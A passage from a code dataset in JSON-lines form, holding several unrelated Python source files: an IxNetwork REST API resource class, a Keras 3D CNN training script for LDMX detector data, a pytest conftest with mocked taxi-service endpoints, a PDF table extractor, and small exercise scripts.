Não é possível dividir por zero')\n return True\n except ValueError:\n print('Insira um NÚMERO')\n return True\n\n\nwhile divisao():\n divisao()\n","repo_name":"Lucas-GSS/study-notes","sub_path":"uninter/analise-e-desenvolvimento-de-sistemas/logica-de-programacao-e-algoritmos/aula-5-funcoes/tratamento_execessao.py","file_name":"tratamento_execessao.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11520851965","text":"import sys\nfrom ixnetwork_restpy.base import Base\nfrom ixnetwork_restpy.files import Files\n\nif sys.version_info >= (3, 5):\n from typing import List, Any, Union\n\n\nclass MulticastLeafRange(Base):\n \"\"\"Configures the multicast leaf range values.\n The MulticastLeafRange class encapsulates a list of multicastLeafRange resources that are managed by the user.\n A list of resources can be retrieved from the server using the MulticastLeafRange.find() method.\n The list can be managed by using the MulticastLeafRange.add() and MulticastLeafRange.remove() methods.\n \"\"\"\n\n __slots__ = ()\n _SDM_NAME = \"multicastLeafRange\"\n _SDM_ATT_MAP = {\n \"ContinuousIncrOpaqueValuesAcrossRoot\": \"continuousIncrOpaqueValuesAcrossRoot\",\n \"Enabled\": \"enabled\",\n \"LabelValueStart\": \"labelValueStart\",\n \"LabelValueStep\": \"labelValueStep\",\n \"LspCountPerRoot\": \"lspCountPerRoot\",\n \"LspType\": \"lspType\",\n \"RootAddrCount\": \"rootAddrCount\",\n \"RootAddrStep\": \"rootAddrStep\",\n \"RootAddress\": \"rootAddress\",\n }\n _SDM_ENUM_MAP = {\n \"lspType\": [\"p2mp\"],\n }\n\n def __init__(self, parent, list_op=False):\n super(MulticastLeafRange, self).__init__(parent, list_op)\n\n @property\n def GroupTrafficRange(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.grouptrafficrange_592edfb5d660c2ef731fff853a50b1a6.GroupTrafficRange): An instance of the GroupTrafficRange class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.grouptrafficrange_592edfb5d660c2ef731fff853a50b1a6 import (\n GroupTrafficRange,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"GroupTrafficRange\", None) is not None:\n return self._properties.get(\"GroupTrafficRange\")\n return GroupTrafficRange(self)\n\n @property\n def OpaqueValueElement(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.opaquevalueelement_27bc1e55a7525caed38e30c9995224e2.OpaqueValueElement): An instance of the OpaqueValueElement class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.opaquevalueelement_27bc1e55a7525caed38e30c9995224e2 import (\n OpaqueValueElement,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"OpaqueValueElement\", None) is not None:\n return self._properties.get(\"OpaqueValueElement\")\n return OpaqueValueElement(self)\n\n @property\n def ContinuousIncrOpaqueValuesAcrossRoot(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n - bool: It signifies the continuous increment of opaque values across root.\n \"\"\"\n return self._get_attribute(\n self._SDM_ATT_MAP[\"ContinuousIncrOpaqueValuesAcrossRoot\"]\n )\n\n @ContinuousIncrOpaqueValuesAcrossRoot.setter\n def 
ContinuousIncrOpaqueValuesAcrossRoot(self, value):\n # type: (bool) -> None\n self._set_attribute(\n self._SDM_ATT_MAP[\"ContinuousIncrOpaqueValuesAcrossRoot\"], value\n )\n\n @property\n def Enabled(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n - bool: If true, enables the protocol.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Enabled\"])\n\n @Enabled.setter\n def Enabled(self, value):\n # type: (bool) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Enabled\"], value)\n\n @property\n def LabelValueStart(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: The first label in the range of labels.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LabelValueStart\"])\n\n @LabelValueStart.setter\n def LabelValueStart(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"LabelValueStart\"], value)\n\n @property\n def LabelValueStep(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: The label value increment step for more than 1 range.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LabelValueStep\"])\n\n @LabelValueStep.setter\n def LabelValueStep(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"LabelValueStep\"], value)\n\n @property\n def LspCountPerRoot(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: This is to specify how many different LSPs are created per Root.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LspCountPerRoot\"])\n\n @LspCountPerRoot.setter\n def LspCountPerRoot(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"LspCountPerRoot\"], value)\n\n @property\n def LspType(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str(p2mp): The type of multicast LSP.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LspType\"])\n\n @property\n def RootAddrCount(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: The root address count for this Multicast FEC range.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"RootAddrCount\"])\n\n @RootAddrCount.setter\n def RootAddrCount(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"RootAddrCount\"], value)\n\n @property\n def RootAddrStep(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: The Root Address increment step. 
This is applicable only if Root Address Count is greater than 1.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"RootAddrStep\"])\n\n @RootAddrStep.setter\n def RootAddrStep(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"RootAddrStep\"], value)\n\n @property\n def RootAddress(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: The root address of the multicast LSP.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"RootAddress\"])\n\n @RootAddress.setter\n def RootAddress(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"RootAddress\"], value)\n\n def update(\n self,\n ContinuousIncrOpaqueValuesAcrossRoot=None,\n Enabled=None,\n LabelValueStart=None,\n LabelValueStep=None,\n LspCountPerRoot=None,\n RootAddrCount=None,\n RootAddrStep=None,\n RootAddress=None,\n ):\n # type: (bool, bool, int, int, int, int, str, str) -> MulticastLeafRange\n \"\"\"Updates multicastLeafRange resource on the server.\n\n Args\n ----\n - ContinuousIncrOpaqueValuesAcrossRoot (bool): It signifies the continuous increment of opaque values across root.\n - Enabled (bool): If true, enables the protocol.\n - LabelValueStart (number): The first label in the range of labels.\n - LabelValueStep (number): The label value increment step for more than 1 range.\n - LspCountPerRoot (number): This is to specify how many different LSPs are created per Root.\n - RootAddrCount (number): The root address count for this Multicast FEC range.\n - RootAddrStep (str): The Root Address increment step. This is applicable only if Root Address Count is greater than 1.\n - RootAddress (str): The root address of the multicast LSP.\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def add(\n self,\n ContinuousIncrOpaqueValuesAcrossRoot=None,\n Enabled=None,\n LabelValueStart=None,\n LabelValueStep=None,\n LspCountPerRoot=None,\n RootAddrCount=None,\n RootAddrStep=None,\n RootAddress=None,\n ):\n # type: (bool, bool, int, int, int, int, str, str) -> MulticastLeafRange\n \"\"\"Adds a new multicastLeafRange resource on the server and adds it to the container.\n\n Args\n ----\n - ContinuousIncrOpaqueValuesAcrossRoot (bool): It signifies the continuous increment of opaque values across root.\n - Enabled (bool): If true, enables the protocol.\n - LabelValueStart (number): The first label in the range of labels.\n - LabelValueStep (number): The label value increment step for more than 1 range.\n - LspCountPerRoot (number): This is to specify how many different LSPs are created per Root.\n - RootAddrCount (number): The root address count for this Multicast FEC range.\n - RootAddrStep (str): The Root Address increment step. 
This is applicable only if Root Address Count is greater than 1.\n - RootAddress (str): The root address of the multicast LSP.\n\n Returns\n -------\n - self: This instance with all currently retrieved multicastLeafRange resources using find and the newly added multicastLeafRange resources available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def remove(self):\n \"\"\"Deletes all the contained multicastLeafRange resources in this instance from the server.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n self._delete()\n\n def find(\n self,\n ContinuousIncrOpaqueValuesAcrossRoot=None,\n Enabled=None,\n LabelValueStart=None,\n LabelValueStep=None,\n LspCountPerRoot=None,\n LspType=None,\n RootAddrCount=None,\n RootAddrStep=None,\n RootAddress=None,\n ):\n # type: (bool, bool, int, int, int, str, int, str, str) -> MulticastLeafRange\n \"\"\"Finds and retrieves multicastLeafRange resources from the server.\n\n All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve multicastLeafRange resources from the server.\n To retrieve an exact match ensure the parameter value starts with ^ and ends with $\n By default the find method takes no parameters and will retrieve all multicastLeafRange resources from the server.\n\n Args\n ----\n - ContinuousIncrOpaqueValuesAcrossRoot (bool): It signifies the continuous increment of opaque values across root.\n - Enabled (bool): If true, enables the protocol.\n - LabelValueStart (number): The first label in the range of labels.\n - LabelValueStep (number): The label value increment step for more than 1 range.\n - LspCountPerRoot (number): This is to specify how many different LSPs are created per Root.\n - LspType (str(p2mp)): The type of multicast LSP.\n - RootAddrCount (number): The root address count for this Multicast FEC range.\n - RootAddrStep (str): The Root Address increment step. 
This is applicable only if Root Address Count is greater than 1.\n - RootAddress (str): The root address of the multicast LSP.\n\n Returns\n -------\n - self: This instance with matching multicastLeafRange resources retrieved from the server available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def read(self, href):\n \"\"\"Retrieves a single instance of multicastLeafRange data from the server.\n\n Args\n ----\n - href (str): An href to the instance to be retrieved\n\n Returns\n -------\n - self: This instance with the multicastLeafRange resources from the server available through an iterator or index\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._read(href)\n","repo_name":"OpenIxia/ixnetwork_restpy","sub_path":"ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/multicastleafrange_61982e4d7933d5db8e1c6734f344bc95.py","file_name":"multicastleafrange_61982e4d7933d5db8e1c6734f344bc95.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"28470307943","text":"def fun(i):\n if first[i] != 100:\n current = first[i]\n if current == 99:\n global count\n count = 1\n return count\n fun(current)\n if second[i] != 100:\n current = second[i]\n if current == 99:\n #global count\n count = 1\n return count\n fun(current)\nT = 10\nfor test_case in range(1, T + 1):\n length = list(map(int, input().split()))\n table = list(map(int, input().split()))\n first = [100] * 100\n second = [100] * 100\n count = 0\n a = 0\n while 1:\n first[table[a*2]] = table[a*2+1]\n a += 1\n if a < 0 or a >= length[1]:\n break\n second[table[a * 2]] = table[a * 2 + 1]\n a += 1\n if a < 0 or a >= length[1]:\n break\n fun(0)\n print(\"#%d %d\" % (test_case, count))\n\n","repo_name":"elves37/Algorithm","sub_path":"SW_Expert/4일차/1219_길찾기.py","file_name":"1219_길찾기.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24631965844","text":"import pandas as pd\r\nimport os\r\nimport camelot\r\n\r\ndef getcolname(name):\r\n name = name.lower()\r\n if name.find(\"name\") >= 0 or name.find(\"drug\") >= 0 :\r\n return \"Name of Drugs/ Cosmetics\"\r\n elif name.find(\"batch\") >= 0 or name.find(\"manuf\") >= 0 :\r\n return \"Batch No./ Date of Manufacture/ Date of Expiry/ Manufactured By\"\r\n elif name.find(\"reason\") >= 0 :\r\n return \"Reason for Failure\"\r\n elif name.find(\"receiv\") >= 0 :\r\n return \"Received From\"\r\n elif name.find(\"declared\") >= 0 :\r\n return \"Declared by\"\r\n elif name.find(\"year\") >= 0:\r\n return \"Year\"\r\n elif name.find(\"month\") >= 0 :\r\n return \"Month\"\r\n elif name.find(\"from\") >= 0 :\r\n return \"Drawn From\"\r\n elif name.find(\"draw\") >= 0 and name.find(\"by\") >= 0 :\r\n return \"Drawn By\"\r\n elif name.find(\"n\") >= 0 and name.find(\"s\") >= 0 :\r\n return \"Sr. 
No.\"\r\n else :\r\n return name\r\n\r\ndef mergelastandfirst(df0, df1):\r\n df = pd.DataFrame()\r\n last0 = df0.iloc[-1].tolist()\r\n first1 = df1.iloc[0].tolist()\r\n merged = [last0[i] + first1[i] for i in range(len(last0))]\r\n merged_df = pd.DataFrame([merged])\r\n df = df.append(df0.iloc[0: df0.shape[0] - 1, :], ignore_index=True)\r\n df = df.append(merged_df, ignore_index=True)\r\n df = df.append(df1.iloc[1: df0.shape[1], :], ignore_index=True)\r\n return df\r\n\r\ndef merge_Dataframes(df1,df2):\r\n if not (df2[0][0] == \"\"):\r\n df1 = df1.append(df2, ignore_index=True)\r\n\r\n else :\r\n df1 = mergelastandfirst(df1,df2)\r\n\r\n return df1\r\n\r\n# folder where splitted PDF files would be created and stored\r\nmain_dir = r\"C:\\Users\\lenovo\\Desktop\\ISB - Prof. Parshuram\\CDS data\\Split_PDFs\"\r\n\r\n# folder where extracted tables would be stored\r\nexl_path = r\"C:\\Users\\lenovo\\Desktop\\ISB - Prof. Parshuram\\CDS data\\ExtractedTables\"\r\n\r\nfor folder in os.scandir(main_dir):\r\n\r\n directory = folder.path\r\n name = os.path.basename(directory).strip(\".pdf\")\r\n df = pd.DataFrame()\r\n\r\n try:\r\n for filename in os.scandir(directory):\r\n tables = camelot.read_pdf(filename.path)\r\n try :\r\n data_f = tables[-1].df\r\n df = merge_Dataframes(df,data_f)\r\n except :\r\n pass\r\n\r\n for col in df.columns:\r\n colname = getcolname(df.iloc[0,col])\r\n df = df.rename(columns={col: colname})\r\n\r\n df = df.drop(df.index[[0]])\r\n\r\n excel_path = exl_path + \"/\" + name + \".xlsx\"\r\n\r\n df.to_excel(excel_path, index=False)\r\n\r\n except :\r\n print(name)\r\n\r\n\r\n\r\n\r\n","repo_name":"Shashankti/ISB_Data_Scrapping","sub_path":"extracttables.py","file_name":"extracttables.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33634384402","text":"# pylint: disable=wildcard-import, unused-wildcard-import, import-error\nfrom typing import Optional\nimport urllib\nimport uuid\n\nimport pytest\n\nfrom ride_discounts_plugins import * # noqa: F403 F401\n\nfrom tests_ride_discounts import common\n\n\ndef pytest_configure(config):\n config.addinivalue_line('markers', 'slow: mark slow test')\n\n\n@pytest.fixture(autouse=True)\nasync def user_statistics_handler(mockserver):\n @mockserver.json_handler('/user-statistics/v1/orders')\n def _v1_orders(request):\n return {'data': []}\n\n\n@pytest.fixture(name='start_revision')\ndef _start_revision():\n return '22'\n\n\n@pytest.fixture\ndef reset_revision(pgsql, start_revision):\n pgsql['ride_discounts'].cursor().execute(\n 'ALTER SEQUENCE ride_discounts.match_rules_revision '\n f'RESTART WITH {start_revision};',\n )\n\n\n@pytest.fixture\ndef reset_data_id(pgsql):\n pg_cursor = pgsql['ride_discounts'].cursor()\n pg_cursor.execute(\n 'ALTER SEQUENCE ride_discounts.match_data_data_id_seq '\n f'RESTART WITH {common.START_DATA_ID};',\n )\n\n\n@pytest.fixture\nasync def additional_rules():\n return [\n {\n 'condition_name': 'zone',\n 'values': [\n {\n 'is_prioritized': False,\n 'name': 'br_moscow',\n 'type': 'geonode',\n },\n ],\n },\n ]\n\n\n@pytest.fixture(autouse=True)\ndef mock_taxi_tariffs(mockserver):\n @mockserver.json_handler('/taxi-tariffs/v1/tariff_zones')\n def _tariff_zones(request):\n zones = [\n {\n 'name': name,\n 'time_zone': 'Europe/Moscow',\n 'country': 'rus',\n 'translation': name,\n 'currency': 'RUB',\n }\n for name in request.query.get(\n 'zone_names', 'moscow,boryasvo,vko',\n ).split(',')\n ]\n return {'zones': 
zones}\n\n\n@pytest.fixture(autouse=True)\ndef mock_tariff_settings(mockserver):\n @mockserver.json_handler('/taxi-tariffs/v1/tariff_settings/list')\n def _mock_tariff_setting_list(request):\n params = urllib.parse.parse_qs(request.query_string.decode())\n cursor = params.get('cursor', [''])[0]\n if cursor == 'final':\n return {'zones': [], 'next_cursor': 'final'}\n return {\n 'zones': [\n {\n 'categories': [\n {\n 'can_be_default': True,\n 'card_payment_settings': {\n 'max_compensation': 5000,\n 'max_manual_charge': 5000,\n 'max_refund': 5000,\n },\n 'charter_contract': True,\n 'client_constraints': [],\n 'client_requirements': [\n 'bicycle',\n 'childchair_moscow',\n 'yellowcarnumber',\n 'conditioner',\n 'nosmoking',\n ],\n 'comments_disabled': False,\n 'disable_ban_for_feedback': False,\n 'disable_destination_change': False,\n 'disable_live_location': False,\n 'disable_zone_leave': False,\n 'driver_change_cost': {},\n 'fixed_price_enabled': True,\n 'free_cancel_timeout': 300,\n 'glued_requirements': [],\n 'is_default': True,\n 'legal_entities_enabled': True,\n 'mark_as_new': False,\n 'max_card_payment': 5000,\n 'max_corp_payment': 5000,\n 'max_route_points_count': 5,\n 'name': 'econom',\n 'only_for_soon_orders': False,\n 'persistent_requirements': [\n 'animaltransport',\n 'nosmoking',\n ],\n 'req_destination': False,\n 'service_levels': [50],\n 'tanker_key': 'name.econom',\n 'toll_roads_enabled': False,\n },\n ],\n 'home_zone': 'moscow',\n 'timezone': 'Europe/Moscow',\n },\n {'home_zone': 'boryasvo', 'timezone': 'Europe/Moscow'},\n {'home_zone': 'vko', 'timezone': 'Europe/Moscow'},\n ],\n 'next_cursor': 'final',\n }\n\n\n@pytest.fixture(autouse=True)\ndef mock_billing_limits(mockserver):\n\n data = {\n 'currency': 'RUB',\n 'label': 'discount limit discount_limit_id',\n 'windows': [\n {\n 'type': 'tumbling',\n 'value': '100000.0000',\n 'size': 86400,\n 'label': 'Daily limit',\n 'threshold': 100,\n 'tumbling_start': '2019-01-01T00:00:00+00:00',\n },\n {\n 'type': 'sliding',\n 'value': '700000.0000',\n 'size': 604800,\n 'label': 'Weekly limit',\n 'threshold': 100,\n 'tumbling_start': '2019-01-01T00:00:00+00:00',\n },\n ],\n 'tickets': ['ticket-1'],\n 'ref': 'discount_limit_id',\n 'approvers': ['approver'],\n 'tags': ['ride-discounts'],\n }\n\n @mockserver.json_handler('/billing-limits/v1/get')\n def _get(request):\n return data\n\n @mockserver.json_handler('/billing-limits/v1/create')\n def _create(request):\n return data\n\n\n@pytest.fixture()\ndef client(taxi_ride_discounts):\n return taxi_ride_discounts\n\n\n@pytest.fixture()\ndef add_rules_check_url():\n return common.ADD_RULES_CHECK_URL\n\n\n@pytest.fixture()\ndef add_rules_url():\n return common.ADD_RULES_URL\n\n\n@pytest.fixture()\ndef service_name():\n return 'ride_discounts'\n\n\n@pytest.fixture()\ndef headers():\n return common.get_headers()\n\n\n@pytest.fixture()\ndef default_discount():\n return common.make_discount(hierarchy_name='full_money_discounts')\n\n\n@pytest.fixture()\ndef condition_descriptions(load_json):\n return load_json('condition_descriptions.json')\n\n\n@pytest.fixture()\ndef prioritized_entity_url():\n return common.PRIORITIZED_ENTITY_URL\n\n\n@pytest.fixture()\ndef hierarchy_descriptions_url():\n return '/v1/admin/match-discounts/hierarchy-descriptions'\n\n\n@pytest.fixture()\ndef draft_id_is_uuid():\n return True\n\n\n@pytest.fixture()\ndef add_discount(add_rules):\n async def wrapper(\n hierarchy_name: str,\n rules,\n series_id: Optional[uuid.UUID] = None,\n discount=None,\n ):\n await add_rules(\n {\n 
hierarchy_name: [\n {\n 'rules': rules,\n 'discount': discount or common.make_discount(\n hierarchy_name=hierarchy_name,\n ),\n 'series_id': str(series_id) if series_id else None,\n },\n ],\n },\n )\n\n return wrapper\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_ride_discounts/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24210959320","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np \nimport time\n\n\nimport tensorflow as tf #This imports tensorflow which this model is built in \n\n\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Model, Sequential#Model and sequential can both be used when building the model \nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Input, Activation\nfrom tensorflow.keras.layers import Conv3D,Conv2D, MaxPooling2D\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import Lambda, concatenate\n\nfrom tensorflow.keras.optimizers import SGD, Adam, RMSprop, Nadam #This imports a series of different optimizers that can be tested \nfrom tensorflow.keras import backend as K\n\nfrom sklearn.metrics import *\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.utils import to_categorical #To categorical is useful for dealing with tasks with \nfrom tensorflow.keras import layers \nfrom tensorflow.keras.initializers import Constant\nfrom tensorflow.keras.callbacks import EarlyStopping #Early stopping allows for stopping when the changes are small while training the model \n\nimport os\nimport shutil\n\ntrain_dir = 'DataDirectory'#This is wherever you have saved the data that was produced after preprocessing that you want to feed to your network \n\nsubdirs, dirs, files = os.walk('DataDirectory').__next__()#This will walk around the directory and pick out any files it discovers there \n\nm = len(files)#This is the amount of files located in the directory \n\nprint(m)\n\nfilenames = []#This stores the filenames \n\nlabels = np.zeros((m, 1))#This creates an array full of zeros that will be used for the labels on the \n\n\nfilenames_counter = 0#This counts how many files there are\nlabels_counter = -1#This counts how many lables there are\n\nfor subdir, dirs, files in os.walk(train_dir):\n for file in files:\n filenames.append(file)#Appends file from the directory \n labels[filenames_counter, 0] = int(file[0]) #Gets the label from the first letter of the file (i.e. 
a file should be named something like 1e{} for this to work)\n filenames_counter = filenames_counter + 1\n labels_counter = labels_counter+1\n \n# For now just renames it, not really necessisary at this this stage \ny_labels_one_hot = labels\n\n\nfrom sklearn.utils import shuffle #Shuffle does what it says and randomizes the file name order \n\nfilenames_shuffled, y_labels_one_hot_shuffled = shuffle(filenames, y_labels_one_hot)\n\n\nfrom sklearn.model_selection import train_test_split #This allows the splitting of the dataset into a training data set and a validation data set without having to do it by hand \n\n\nfilenames_shuffled_numpy = np.array(filenames_shuffled)#This creates an array of the file names \n\n#This splits the data into a training and validation set with the test size specifying how much of the data is in the validation data set \nX_train_filenames, X_val_filenames, y_train, y_val = train_test_split(\n filenames_shuffled_numpy, y_labels_one_hot_shuffled, test_size=0.3, random_state=1)\n\n#Just prints the size of the different datasets as a way to double check \nprint(X_train_filenames.shape)\nprint(y_train.shape) \nprint(X_val_filenames.shape) \nprint(y_val.shape) \n\n#The batch_size specifies how large the minibatch size is going to be\nbatch_size = 32\n#The number of categories that will be used \nNumberClasses = 4 \n\n\nclass My_Custom_Generator(keras.utils.Sequence):#This is a generator that will load only the batch size number of files per iteration rather than loading alll of the data at once \n \n def __init__(self, filenames, labels, batch_size) :\n self.filenames = filenames#The file names inputs \n self.labels = labels#The labels input \n self.batch_size = batch_size #The batch size once again \n \n \n def __len__(self): #This gets the number of iterations that have to be performed to loop through all of the data and casts it as an integer \n return (np.ceil(len(self.filenames) / float(self.batch_size))).astype(np.int)\n\n def __getitem__(self, idx) :#This function actually loads the data \n batch_x = self.filenames[idx * self.batch_size : (idx+1) * self.batch_size]#This gets the filenames in the batch and prepares for the data to be loaded \n \n batch_y = self.labels[idx * self.batch_size : (idx+1) * self.batch_size]#This deals with the labels of the data in the batch \n \n Array = []\n\n \n for file_name in batch_x:#This will loop through the files included in the batch \n A = np.load('/DataDirectory/' + str(file_name))#This assumes that the data is some file that can be directly loaded using np.load\n AA = A['arr_0']#In an .npz file the array is saved under this header \n Array.append(AA)\n\n \n ADone = np.array(Array)#Make an array of the loaded data \n print(ADone.shape[0])#Prints the shape \n ADone = ADone.reshape(ADone.shape[0],35,8,450,1)#This ensures the data has the right shape for this case the shape is consistent with a data set that includes both Ecal and Trigger Scintillator data, if considered just Ecal change this to ADone = ADone.reshape(ADone.shape[0],34,7,450,1) \n LL = []\n\n for i in batch_y:#Loop through the labels \n JJ = i[0]-1 #Since our label goes from 1-4 we need to reduce it to 0-3 \n LL.append(JJ)\n \n YY = LL #Just renames it \n YY = to_categorical(np.array(YY),num_classes=NumberClasses) #This changes the labels into an array with categories that can be handled by the model \n print(YY.shape)\n return np.array(ADone), YY# This returns the loaded data and the labels \n \n \n\n\n\nmy_training_batch_generator = 
My_Custom_Generator(X_train_filenames, y_train, batch_size)#This loads a training batch generator \n\nmy_validation_batch_generator = My_Custom_Generator(X_val_filenames, y_val, batch_size)#This loads a validation batch generator \n\n\nfrom tensorflow.keras.layers import BatchNormalization #BatchNormalization can be used to normalize the input arrays which can make it easier for the network to deal with the arrays especially if the data has a lot of large or small numbers \n\nfrom tensorflow.keras import regularizers #Regulizers help with validation performance, you can combine l1l2() or use them seperately \n\n\n#The Model here was Used for the Ecal and Trigger Scintillator Dataset\n\nmodel = Sequential()#Sequential allows for the building of models by adding layers in order \n\n\nmodel.add(layers.Conv3D(64,(2,2,2),activation='relu',input_shape=(35,8,450,1)))#This adds a 3D convolutional layer \nmodel.add(BatchNormalization())#This adds a batch normalization layer with no specified axis \nmodel.add(layers.MaxPooling3D((2,2,2))) #Max Pooling layer in 3D\n\n\n\nmodel.add(layers.Conv3D(64,(2,2,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((1,1,2))) \n\n\n\nmodel.add(layers.Conv3D(64,(2,1,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((1,1,3))) \n\n\n\nmodel.add(layers.Conv3D(64,(2,2,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((2,1,5))) \n\n\n\nmodel.add(layers.Conv3D(64,(2,1,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((2,1,3))) \n\nmodel.add(tf.keras.layers.Flatten())#This layer flattens the data\n\nmodel.add(layers.Dense(128,'tanh',kernel_regularizer=regularizers.L1(l1=1e-3))) #This adds an L1 regularizer in a dense layer thsat is just a series of connected nodes \n\nmodel.add(Dropout(0.6))#This adds a dropout layer that aids validation set performance \n\nmodel.add(layers.Dense(NumberClasses,'softmax'))#Adds a final output layer using softmax \n\nmodel.summary()#This prints a summary of the model \n\n\nlearning_rate = 0.005\n\n\n\n#Loss Function: CategoricalCrossentropy\n\nmodel.compile(Adam(learning_rate),tf.keras.losses.CategoricalCrossentropy(),['accuracy'])#This compiles the model with an Adam optimizer and the Categorial Crossentropy loss function \n\n#Estimator is just a name for the results from our model it can be named anything, model.fit() initiates the training of the network and it will loop over the data. 
This will be performed 15 times as epochs = 15, early stopping can be added to the model as well \nEstimator = model.fit(my_training_batch_generator,epochs = 15,verbose = 1,validation_data = my_validation_batch_generator) #,callbacks=[EarlyStopping(patience=15)])\n\nmodel.save(\"ModelNameHere\")#This saves the model, you can train and then stop and then resume the training just have to reload the model \n\nplt.figure()\nplt.ylabel('Loss / Accuracy')\nplt.xlabel('Epoch')\nfor k in Estimator.history.keys():#This makes a plot of the overall performance of the model over the number of epochs \n plt.plot(Estimator.history[k], label = k) \nplt.legend(loc='best')\nplt.show()\nplt.savefig(\"ModelHistory.png\")\n\n\n\n#Load the model for extra work by using keras.models.load_model\n\n#reconstruct = keras.models.load_model(\"ModelNameHere\")\n\n\n\n\n\n\n\n\n\n","repo_name":"Udcstb99/LDMXML","sub_path":"CNNModelANN.py","file_name":"CNNModelANN.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6474239952","text":"def bagi(a, b):\n # Memeriksa tipe data a dan b\n if not (isinstance(a, float) or isinstance(a, int)):\n raise ValueError('Nilai a harus bertipe bilangan')\n if not (isinstance(b, float) or isinstance(b, int)):\n raise ValueError('Nilai b harus bertipe bilangan')\n \n # Memeriksa apakah b adalah nol\n if b == 0:\n raise ZeroDivisionError('')\n\n return a / b\n\ndef main():\n try:\n # Memanggil fungsi bagi dengan argumen 6.0 dan 3\n c = bagi(6.0, 3)\n print(c)\n\n except ValueError as e:\n print(e)\n\n except ZeroDivisionError as e:\n print(e)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Gustinest/Python-Basics","sub_path":"Penanganan eksepsi/raise.py","file_name":"raise.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40910333991","text":"import sys\nsys.path.append('../..')\nfrom lenser import *\nimport numpy as np\nfrom astropy.io import fits\nimport pandas as pd\nimport time, sys\n\n\n\n\"\"\"\nModule: lenser_run_cat_multi_fit\n.. synopsis: Runs an entire catalogue of galaxy images through Lenser in multi-fit mode \n and exports pickle file of bestfit parameters\n.. module author: Evan J. Arena \n\n.. This script will import one of the Catalogues in the Catalougues folder and run all of the images through Lenser.\n.. A prep 